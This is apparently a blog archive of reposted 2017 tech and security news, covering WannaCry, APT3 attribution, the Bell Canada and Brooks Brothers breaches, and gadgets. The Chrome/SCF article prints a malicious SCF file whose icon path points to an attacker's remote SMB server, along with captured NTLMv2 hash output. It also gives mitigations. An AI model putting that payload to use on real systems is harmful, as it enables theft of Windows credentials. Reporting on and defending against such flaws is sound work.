Category Archive: Uncategorized

Cyber Risk Management: What’s Holding Us Back?

Organizations Are Struggling to Operationalize Their Knowledge of Risk.

Over the past year, cyber risk management has gained a lot of attention in the media and among practitioners. Even though risk management has been proven to optimize business performance and lead to better investment decisions, many organizations have still not adopted this concept when it comes to their enterprise security model. Last week’s WannaCry ransomware attack is a stark reminder that a risk-based approach to security is long overdue. WannaCry is the last cyber-attack to expose the industry’s inability to find and fix threats that really matter. So what’s holding organizations back from implementing cyber risk management?

Consider these facts… last Friday, the world faced the biggest cyber-attack yet, with more than 300,000 organizations in more than 200 countries falling victim to the WannaCry ransomware. The malware exploited a known vulnerability in the Microsoft Windows SMB Server, for which the vendor had provided a patch on March 14, 2017. Unfortunately, many organizations had not patched or were simply running on operating systems that had reached their end of life (e.g., Windows XP and Windows Server 2000) and do not receive new security updates. While the attack’s impact has been massive, the story behind it is very characteristic of any successful cyber-attack — hackers are exploiting known vulnerabilities and are betting on the fact that organizations don’t know how to fix what really matters.

That’s where cyber risk management comes into play. Many industry standard bodies (e.g., Payment Card Industry) and government regulators (e.g., Office of the Comptroller of the Currency, SEC) have taken steps to propagate the usage of risk management by incorporating its core principles into their regulations. These refreshed guidelines are designed to address several factors including scarcity of resources, the disruptive effect of big data in the context of cyber security, market volatility, regulatory changes, and the need for better, faster decision making.

However, many organizations are still struggling to operationalize their knowledge of risk in order to optimize business investments and performance. Let’s look at the factors that are preventing organizations from adopting a risk-based approach to security and what can be done to overcome them.

Risk Culture

When implementing cyber risk management practices, it is essential to instill a risk-aware culture at all levels and across all functional areas of the organization. Lack of buy-in from all stakeholders is one of the most common hurdles to making the transition from a compliance- to risk-driven approach to security. There are many examples of organizations that hired a first-time Chief Risk Officer in an attempt to force the transition, but failed due to the fact that the individuals required to implement the new practices on a day-to-day basis were still stuck in their antiquated compliance views. To be successful, risk management must avoid a gap between senior management and the rest of the organization when it comes to understanding and embracing risk management concepts and benefits. To address this roadblock, a well thought out training program is required for current and incoming employees.

Risk Management Perceptions

Although risk management was initially introduced to increase shareholder value, not all companies understand its benefits. It is important to realize that there is no one-size-fits all approach, but rather the benefits and costs of risk management are dependent on factors such as organizational size, complexity, vertical industry, and location. Considering these factors when planning the scope of a cyber risk management implementation will increase the odds that its benefits will be more clearly understood and supported across the organization.

Risk Technology

Instead of relying on employees to implement cyber risk management in silo-based fashion using antiquated tools such as spreadsheets to document their findings, organizations should consider the use of an intelligence-driven and platform-based system. Pitfalls to look out for include making sure that the derived risk scores are based on a scientific approach that take a multitude of factors (i.e.., vulnerability risk rating, IP reputation, accessibility, and business criticality) into account rather than singling out for instance just the external risk exposure of an organization. In this context, it is essential to assure proper integrations with internal security intelligence data sources to secure investments into existing IT and security tools and to leverage the data to unify with external threat data and business criticality.

Organizations that address the above-mentioned inhibitors to cyber risk management head-on, can significantly reduce the time it takes to identify their cyber risk exposure, quickly orchestrate remediation, and monitor the results. In case of the WannaCry outbreak, a properly implemented cyber risk management program would have identified the exposure and business criticality of the threat weeks prior to the attack, giving the organization plenty of time to patch systems in a controlled and orderly fashion.

 

via:  securityweek


Save pagePDF pageEmail pagePrint page

APT3 Hackers Linked to Chinese Ministry of State Security

Independent researchers and experts from threat intelligence firm Recorded Future are confident that the cyber espionage group tracked as APT3 is directly linked to the Chinese Ministry of State Security (MSS).

While much of the security community typically tries to avoid making attribution statements, arguing that false flags make this task difficult, there are some individuals and companies that don’t shy away from accusing governments of conducting sophisticated cyberattacks.

A mysterious group called “intrusiontruth,” which claims to focus on investigating some of the most important advanced persistent threat (APT) actors, has recently published a series of blog posts on APT3, a group that is also known as UPS Team, Gothic Panda, Buckeye and TG-0110.

The cyberspies, believed to be sponsored by China, have been active since at least 2009, targeting many organizations in the United States and elsewhere via spear-phishing, zero-day exploits, and various other tools and techniques. Researchers noticed last year that APT3 had shifted its attention from the U.S. and the U.K. to Hong Kong, where it had mainly targeted political entities using a backdoor dubbed “Pirpi.”

Intrusiontruth has conducted an analysis of APT3’s command and control (C&C) infrastructure, particularly domain registration data. Their research led to two individuals, named Wu Yingzhuo and Dong Hao, who apparently registered many of the domains used by the threat actor.

Both these individuals are listed as shareholders for a China-based security firm called the Guangzhou Boyu Information Technology Company, or Boyusec. In November 2016, the Washington Free Beacon learned from Pentagon intelligence officials that this company had been working with Chinese telecoms giant Huawei to develop spyware-laden security products that would be loaded onto computers and phones. The unnamed officials said Boyusec was “closely connected” to the Chinese Ministry of State Security.

Intrusiontruth concluded that either Boyusec has two shareholders with the same name as members of APT3, or Boyusec is in fact APT3, which is the more likely scenario.

Recorded Future has dug deeper to find more evidence connecting APT3 to China’s MSS. In a report published on Wednesday, the company said it had attributed the group directly to the MSS with “a high degree of confidence.”

Researchers pointed out that in addition to Huawei, which claimed to use Boyusec for security evaluations of its corporate intranet, Boyusec was also a partner of the Guangdong Information Technology Security Evaluation Center (Guangdong ITSEC), and the organizations have been collaborating on an active defense lab since 2014.

Guangdong ITSEC is apparently a subordinate of the China Information Technology Evaluation Center (CNITSEC), which, according to academic research, is run by the Ministry of State Security.

Experts believe many of the ministry’s subordinates, particularly ones at provincial and local levels, have legitimate public missions and act as a cover-up for intelligence operations.

“Companies in sectors that have been victimized by APT3 now must adjust their strategies to defend against the resources and technology of the Chinese government. In this real-life David vs. Goliath situation, customers need both smart security controls and policy, as well as actionable and strategic threat intelligence,” Recorded Future said in its report.

 

via:  securityweek


Save pagePDF pageEmail pagePrint page

Watts is a huge battery that powers your home

Like Tesla’s Powerwall, Watts is a big battery that can power your home. One Watts cell can support a few small appliances including computers and refrigerators and a few units can power TVs and electric washers. The units can charge via the grid or with solar panels and the Watts units include an app that shows discharge and battery remaining.

The batteries, which were designed in Russia, are stackable which means you can add as many or as few devices to your power network. They can also send energy back onto the grid as necessary. It offers 1.5 kW with a 3kW peak and a capacity of 1.2 kWh.

The company is shipping batteries in August and one unit costs $2,999. They aim to be the LEGO of high-end home batteries, allowing you to add some real power storage to your home, office, or Zombie-proof bunker.

 

via:  techcrunch


Save pagePDF pageEmail pagePrint page

reVIVE is a VR solution for diagnosing ADHD built by high school students

The first team to go onstage at the Disrupt NY 2017 Hackathon showed off reVIVE, a virtual reality solution for diagnosing ADHD. The team of three high school juniors wanted to create a solution that would simplify the lengthy and expensive process of diagnosing the illness.

The team tells me that ADHD normally takes six to nine months to diagnose, and that process alone can cost patients thousands of dollars.

The reVIVE tool is composed of three different tests that gauge the user’s motor skills, sustained concentration and reaction time. Users are asked to perform tasks like navigating a maze, touching colored objects as they light up certain colors and standing still within a defined space. The team created a scoring system to measure a user’s performance that will allow medical professionals to gain a clearer picture of their situation within minutes.

Check out this video:

https://videos.vidible.tv/prod/2017-05/14/591878b8e0fa173c33a9a851_640x360_v1.mp4?6So8hqrOWSsiVtErp9rL3Djq7_jSSheSWCEVSk_9dEG3tY7H_AFGEJxaKskXeGg-

Akshaya Dinesh, 17; Sowmya Patapati, 16; and Amulya Balakrishnan, 17, built the virtual reality app for the HTC Vive using Unity. The team of New Jersey high school students met and became friends at the hackathon. Balakrishnan and Patapati work with the organization #BUILTBYGIRLS.

“We really wanted to quantify ADHD diagnoses,” said Dinesh “When you’re immersed in a 360 environment, patients experience the environment as if they’re really there.”

The team isn’t trying to replace the role of therapists when it comes to treatment, but they believe that the app can serve as a telemedicine tool, alerting a user’s therapist to their latest performance inside the app, while analyzing the data over time thanks to IBM Watson.

Medical diagnosing and treatment have already proven to be a major use case for virtual reality. Companies like MindMaze have already achieved unicorn status catering their VR solutions directly to medical professionals. The team believes that diagnosing illnesses is one of “the best use cases possible for VR.”

 

via: techcrunch


Save pagePDF pageEmail pagePrint page

Test-approved app could kill off the graphing calculator

Students can kiss $150 calculators goodbye.

Math students have a love-hate relationship with the funky, expensive TI-84 graphing calculators, but thanks to a new deal, they’ll soon get a free option. Starting this spring, pupils in 14 US states will be able to use the TI-like Desmos online calculator during standardized testing run by the Smarter Balanced consortium. “We think students shouldn’t have to buy this old, underpowered device anymore,” Desmos CEO Eli Luberoff told Quartz.

The Desmos calculator will be embedded directly into the assessments, meaning students will have access during tests with no need for an external device. It’ll also be available to students in grades 6 through 8 and high school throughout the year. The calculator is free to use, and the company makes money by charging organizations to use it, according to Bloomberg.

The Desmos calculator is more advanced than the TI-84 or other devices, offering a friendlier interface, live graphing updates, and free access via a smartphone, tablet or any other connected device. Thanks to an earlier deal with Smarter Balanced, it also provides accessibility features for the blind and visually impaired. It’s used by students in 146 countries and racks up over 300,000 hours of use per month, the company says.

A Texas Instruments TI-84 calculator hangs on a display rack

Not cheap: the TI-84 graphing calculator (Getty Images)

TI has monopolized the graphing calculator market for years, but Desmos has made rapid inroads since it launched its calculator app in 2011. It’s backed by the world’s largest education company, Pearson PLC, which uses it for its enVision high-school math program. It’s also supported by SAT exam administrator The College Board, which endorses it for drills, practice exams and curriculum assessments.

There are lots of online graphing calculators available, but educators are reluctant to allow them during tests. “Our products include only the features that students need in the classroom, without the many distractions or test security concerns that come with smartphones, tablets and internet access,” Texas Instruments’ Peter Balyta told Bloomberg.

However, the Desmos and Smarter Balanced consortium’s deal negates that concern by embedding the calculator directly into the test, cutting off any outside access. That means students can use the calculator app while studying and have access to the same tech during tests, without needing to spend a bundle on a TI-84 or other calculator. The need for pricey calculators is “a huge source of inequity, and it’s just not the best way to learn,” says Luberoff.

 

via:  engadget


Save pagePDF pageEmail pagePrint page

Nintendo is planning a Legend of Zelda mobile game

Following up on the massive success of Pokémon GO and the, well, slightly less massive success of Super Mario Run, Nintendo is reportedly planning a Legend of Zelda for smartphones for release later this year, or so The Wall St Journal’s sources have it.

Details beyond that are scarce; it would supposedly follow the release of the also-rumored Animal Crossing mobile game, presumably once everyone has played that into the ground.

How exactly they expect to represent the expansive exploring, puzzling and battling that have defined the series heretofore is unclear. Super Mario Run took a minimalist approach to controls, essentially reducing the platformer to a one-button game.

That would be rather difficult with the vastly more complex Zelda series — doubly so considering the improbably well-received Breath of the Wild was so vast and unrestricted. Whether the company would repeat its pricing strategy for Mario is also unknown; sales weren’t quite what it had hoped.

We’ll likely know more soon; Super Mario Run was announced three months ahead of its release. But if the timing hinted at by the WSJ’s sources is correct, we’ll hear about the Animal Crossing game first, though who knows when.

 

via:  techcrunch


Save pagePDF pageEmail pagePrint page

Beware! Hackers Can Steal Your Windows Password Remotely Using Chrome

A security researcher has discovered a serious vulnerability in the default configuration of the latest version of Google’s Chrome running on any version of Microsoft’s Windows operating system, including Windows 10, that could allow remote hackers to steal user’s login credentials.


Researcher Bosko Stankovic of
DefenseCode has found that just by visiting a website containing a malicious SCF file could allow victims to unknowingly share their computer’s login credentials with hackers via Chrome and the SMB protocol.


This technique is not new and was exploited by the Stuxnet — a powerful malware that specially designed to destroy Iran’s nuclear program — that used the Windows shortcut LNK files to compromise systems.

What’s make this attack different from others is the fact that such SMB authentication related attacks have been first time demonstrated on Google Chrome publicly, after Internet Explorer (IE) and Edge.

Chrome + SCF + SMB = Stealing Windows Credentials

SCF (Shell Command File) shortcut file format works similar as LNK files and is designed to support a limited set of Windows Explorer commands that help define an icon on your desktop, such as My Computer and Recycle Bin.

“Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his website to be able to proceed and reuse victim’s authentication credentials,” Stankovic wrote in a blog post, describing the flaw.

Basically, shortcut links on your desktop are a text file with a specific syntax of shell code that defines the location of icon/thumbnail, application’s name and it’s location.

[Shell]
Command=2
IconFile=explorer.exe,3

Since Chrome trusts Windows SCF files, attackers can trick victims into visiting their website containing a maliciously crafted shortcut file, which gets downloaded automatically onto the target systems without prompting confirmation from the users.

As soon as the user opens the folder containing that downloaded file, immediately or later, this file automatically runs to retrieve an icon without the user having to click on it.


But instead of setting the location of an icon image, the malicious SCF file created by the attacker contain the location of a remote SMB server (controlled by the attacker).

[Shell]
IconFile=\\170.170.170.170\icon

So, as soon as the SCF file attempts to retrieve the icon image, it will trick into making an automatic authentication with the attacker’s controlled remote server over SMB protocol, handing over the victim’s username and hashed version of password, allowing the attacker to use your credentials to authenticate to your personal computer or network resource.
“Setting an icon location to a remote SMB server is a known attack vector that abuses the Windows automatic authentication feature when accessing services like remote file shares,” Stankovic said.


But following the Stuxnet attacks, Microsoft forced LNK files to load their icons only from local resources so they’d no longer be vulnerable to such attacks which make them load malicious code from outside servers.


However, SCF files were left alone.

 

Exploiting LM/NTLM Hash Authentication via SCF File

Exploiting LM/NTLM Hash Authentication

Image Source: SANS

But why would your Windows PC automatically hand over your credentials to the server?
If you are unaware, this is how authentication via the Server Message Block (SMB) protocol works in combination with the NTLM challenge/response authentication mechanism.
In short, LM/NTLM authentication works in 4 steps:

  • Windows users (client) attempts to log into a server.
  • The server responds with a challenge value, asking the user to encrypt the challenge value with his hash password and send it back.
  • Windows handles the SCF request by sending the client’s username and hashed version of the password to the server.
  • The server then captures that response and approves authentication, if the client’s hash password is correct.

Now, in the SCF attack scenario, elaborated by Stankovic, Windows will attempt to authenticate to the malicious SMB server automatically by providing the victim’s username and NTLMv2 password hashes (a personal computer or network resource) to the server, as described in above-mentioned step 3.
If the user is part of a corporate network, the network credentials assigned to the user by his company’s sysadmin will be sent to the attacker.

If the victim is a home user, the victim’s Windows username and password will be sent to the attacker.

 

[*] SMB Captured – 2017-05-15 13:10:44 +0200
NTLMv2 Response Captured from 173.203.29.182:62521 – 173.203.29.182
USER:Bosko DOMAIN:Master OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:98daf39c3a253bbe4a289e7a746d4b24
NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e000000000200000000000
00000000000

Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06fc
dd201ccf26d91cd9e326e00000000020000000000000000000000

No doubt, the credentials are encrypted but can be “brute-forced” later to retrieve original login password in plain text.

“It is worth mentioning that SCF files will appear extensionless in Windows Explorer regardless of file and folder settings,” the researcher said. “Therefore, file named picture.jpg.scf will appear in Windows Explorer as picture.jpg. This adds to inconspicuous nature of attacks using SCF files.”

No Need to Decrypt Password *Sometimes*

Since a number of Microsoft services accept the password in its hashed form, the attacker can even use the encrypted password to login to your OneDrive, Outlook.com, Office 365, Office Online, Skype, Xbox Live and other Microsoft services, making the decryption unnecessary.


Such vulnerabilities, according to the researcher, could also pose a serious threat to large organizations as they enable attackers to impersonate one of their members, allowing attackers to immediately reuse gained privileges to further escalate access and gain access and control of their IT resources and perform attacks on other members.

How to Prevent Such SMB Authentication-related Attacks

Simply, block outbound SMB connections (TCP ports 139 and 445) from the local network to the WAN via firewalls, so that local computers can not query remote SMB servers.
Stankovic also advises users to consider disabling automatic downloads in Google Chrome by going to Settings → Show advanced settings → and then Check the “Ask where to save each file before downloading” option.
This change will allow you to manually approve each download attempt, which would significantly decrease the risk of credential theft attacks using SCF files.
Google is aware of the vulnerability and is said to be working on a patch, but no timeframe has been given as to when the patch will be made available to the users.

 

via:  thehackernews


Save pagePDF pageEmail pagePrint page

Bell Canada Hacked: Data of 1.9 Million Customers Stolen

While we all were busy in the WannaCry ransomware menace, two separate data breaches have been reported, one in DocuSign, a major provider of electronic signature technology, and another in BELL, Canada’s largest telecommunications company.

 
Canadian mobile phone, TV, and internet service provider Bell on Monday confirmed that the company had been hit by an unknown hacker who has managed to access its customer information illegally.


In a brief statement released by Bell Canada, the company said an unknown hacker managed to have his hands on data of millions of Bell customers.

However, the company did not mention the compromised customer details stolen in the hack were pulled from which particular service.


The company said email addresses, names and telephone numbers of its customers had been accessed in the breach.

How many victims Affected?

Bell confirmed the hack and said the unknown hacker has managed to gain access to information on nearly 2 million customers.

“The illegally accessed information contains approximately 1.9 million active email addresses and approximately 1,700 names and active phone numbers,” the company said.

However, Bell assured its customers that there’s no indication of hacker’s access to “financial, password or other sensitive personal information,” and that the incident is not linked to the global WannaCry ransomware attacks.

What’s the Missing Link?

The incident seems to be an extortion attempt by a hacker or group of hackers who posted some of the stolen data of Bell Canada customers online and threatened to leak more data if the company fails to cooperate.

“We are releasing a significant portion of Bell.ca’s data due to the fact that they have failed to [co-operate] with us,” reads a post on PasteBin published Monday afternoon, several hours before Bell Canada released its apology.

“This shows how Bell doesn’t care for its [customers’] safety and they could have avoided this public announcement… Bell, if you don’t [co-operate], more will leak :).”

There is still no explanation for who is behind the extortion demand or what sort of cooperation the hackers were seeking for, but it appears Bell Canada refused to pay the ransom demand.


However, this information remains unconfirmed.

What is Bell Canada doing? The Canada’s largest telecommunication said the company is working with the Canadian law enforcement authorities to figure out who was responsible for the attack.

“We apologize to Bell customers for this situation and are contacting those affected directly,” the company said.

“Bell took immediate steps to secure affected systems. The company has been working closely with the RCMP cyber crime unit in its investigation and has informed the Office of the Privacy Commissioner.”

What should Bell Canada customers do?

While Bell Canada believes there is “minimal risk involved for those affected” by the attack, having access to customer information, including email addresses, names and/or telephone numbers, opens the opportunity for targeted phishing attacks to customers.

 
So, users should particularly be alert of any phishing email, which are usually the next step of cyber criminals after a breach to trick users into giving up further details like financial information.

 
For the obvious reasons, all Bell Canada customers are highly recommended to change their passwords as soon as possible.

 

via:  thehackernews


Save pagePDF pageEmail pagePrint page

Over 200 Brooks Brothers Stores Hit by Payment Card Breach

U.S. clothing retailer Brooks Brothers, which operates more than 400 stores worldwide, informed customers last week that cybercriminals had access to its payment processing systems for nearly one year.

According to the company, attackers installed malware designed to capture payment card data at many of its retail and outlet locations. While the organization does not store card data, the malware intercepted information as it passed through its systems.

Customers who made purchases at certain Brooks Brothers locations in the U.S. and Puerto Rico between April 4, 2016, and March 1, 2017, may have had their payment card information stolen. The exposed information includes names, credit and debit card numbers, card expiration dates, and verification codes. However, not all transactions were affected.

The retailer pointed out that social security numbers or other personally identifiable information was not compromised in the breach. It also noted that online transactions were not at risk, and Brooks Brothers airport locations were not impacted.

Brooks Brothers has set up a web page that lists all the impacted locations in each state. More than 220 stores are listed, with a majority in California, Florida, Massachusetts, New Jersey, New York, North Carolina, Pennsylvania and Texas.

The company is confident that the malware has been removed from its systems. Law enforcement has been alerted and experts have been called in to investigate the incident and assist with remediation efforts.

Brooks Brothers has provided some advice on what potentially affected customers can do to protect themselves against payment card fraud, but pointed out that it cannot be certain whether any particular individual is affected, which is why it will not call or email anyone regarding the breach. It’s not uncommon for scammers to take advantage of such incidents to trick people into handing over personal and financial information.

Customers who have concerns or questions can call 888-735-5927 between 9:00 AM and 9:00 PM ET, Monday through Friday.

Brooks Brothers is not the only major clothing retailer to suffer a data breach recently. Last year, Eddie Bauer informed customers that its payment processing systems had been infected with malware for more than six months.

 

via:  securityweek


Save pagePDF pageEmail pagePrint page

NSA tools behind worldwide WanaCryptOr ransomware attack

A ransomware attack leveraging alleged NSA hacking tools that began hitting the U.K. National Health System earlier today, has spread globally, impacting FedEx and Spanish telecom Telefonica, and locking up tens of thousands of computers in 74 countries.

Early analysis has found that the attackers dropped WanaCryptOr 2.0 ransomware using an exploit tool released last month by the Shadow Brokers hacking group. The ransomware, also known as Wannacry, the displays a ransom note demanding $300 in Bitcoin that must be paid within three days. The most widely hit countries so far are the Russian Federation, Ukraine, India and Taiwan, according to Kaspersky Labs. About 60,000 computers in total are infected.

The attacker has not yet been named, however, a 22-year-old independent cybersecurity researcher who tweets at @MalwareTechBlog and blogs at MalwareTech is being credited with helping mitigate the attack on Friday. He discovered the malware once injected into a target computer attempted to contact a command and control website, reported the Telegraph. If the target computer was unable to make a connection to that website the ransomware then activated taking the computer hostage. However, if the target computer was able to successfully contact the remote website it simply terminated itself and did not install the ransomware.

The researcher was able to use this to his advantage. The remote website was for sale, so he bought it for a small sum, once it showed up as officially purchased it began connecting to all the infected computers effectively turning off the attack.

“A few seconds after the domain had gone live I received a DM from a Talos analyst asking for the sample I had which was scanning SMB host, which i provided. Humorously at this point we had unknowingly killed the malware so there was much confusion as to why he could not run the exact same sample I just ran and get any results at all,” he wrote.

However, before the researcher was able to enact his plan the ransomware had spread globally.

“The ransomware is spread using a known, and patched, vulnerability (MS17-010) that came from a leaked NSA set of exploits that we reported on our blog in April. Our research shows the encryption is done with RSA-2048 encryption. That means that decryption will be next to impossible, unless the coders have made a mistake that we haven’t found yet,” wrote Malwarebytes researcher Pieter Arntz.

Courtesy of Malwarebytes

The vulnerability MS17-010 is also known as ETERNALBLUE, which was patched by Microsoft in March, and is used to inject the backdoor malware DoublePulsar, according to Cyberscoop. The malicious actors then use the backdoor to infect the target machine with WanaCryptOr.

The initial entry into a company is most like through a phishing attack.

“It would be shocking if the NSA knew about this vulnerability, but failed to disclose it to Microsoft until after it was stolen. It is past time for Congress to enhance cybersecurity by passing a law that requires the government to disclose vulnerabilities to companies in a timely manner. Patching security holes immediately, not stockpiling them, is the best way to make everyone’s digital life safer,” said Patrick Toomey, a staff attorney with the American Civil Liberties Union’s National Security Project.

“The speed with which it’s spreading is frightening. Ransomware becomes a significant nuisance if full backups of the systems weren’t taken, dramatically increasing the recovery time if the ransom isn’t paid,” said Gavin Millard, Tenable EMEA technical director.

The scattershot nature of the attack has also raised eyebrows with it hitting a variety of industries and countries.

“This kind of attack is indiscriminate in its nature, it will attack any machine that is not patched for the particular vulnerability, in this case MS17-010, that it is exploiting. This appears to be financially motivated, however that doesn’t mean that there aren’t other potential scenarios,” Owen Connelly, VP services at IOActive, told SC Media.

Phil Richards, CISO with Ivanti, called the persistent nature of this attack strong, with infected systems – at least those that do not pay the ransom – having to be powered down and rebuilt from scratch. Also, all backups have to be pulled off the network so they do not become ensnared.

“It isn¹t surprising that NHS haven¹t gotten to root cause yet. Since 90% of this type of ransomware comes in through phishing, my assumption went with the numbers. This ransomware enumerates accounts and systems when it infects a machine, so spreading to servers is also expected. Servers are more consistently available on the network than workstations. So far, this appears to be a Windows only ransomware, not affecting Linux or Mac.

Because the attack is taking advantage of an already patched vulnerability some experts are calling it a failure on behalf of the victims to have left their systems unpatched.

“This is an example of the systemic failure of government and commercial firms to implement security, resiliency and appropriate privacy policies,” said Philip Lieberman, president of Lieberman software.

John Bambenek, threat research manager at Fidelis Cybersecurity, said that the WannaCry attack demonstrates the serious consequences that can occur when a nation-state’s zero-day exploit is leaked into the wild, even after a patch is developed. “This is the first time that a worm-link tool has been used in conjunction with ransomware that has created devastating impact against entire organizations,” said Bambenek. “Strong and swift patching would have helped mitigate this threat. It has undoubtedly captured the imagination of criminals who don’t want to hold individual machines ransom but to take entire organizations hostage and surely we will see much more of this in the coming weeks.”

 

via:  scmagazine


Save pagePDF pageEmail pagePrint page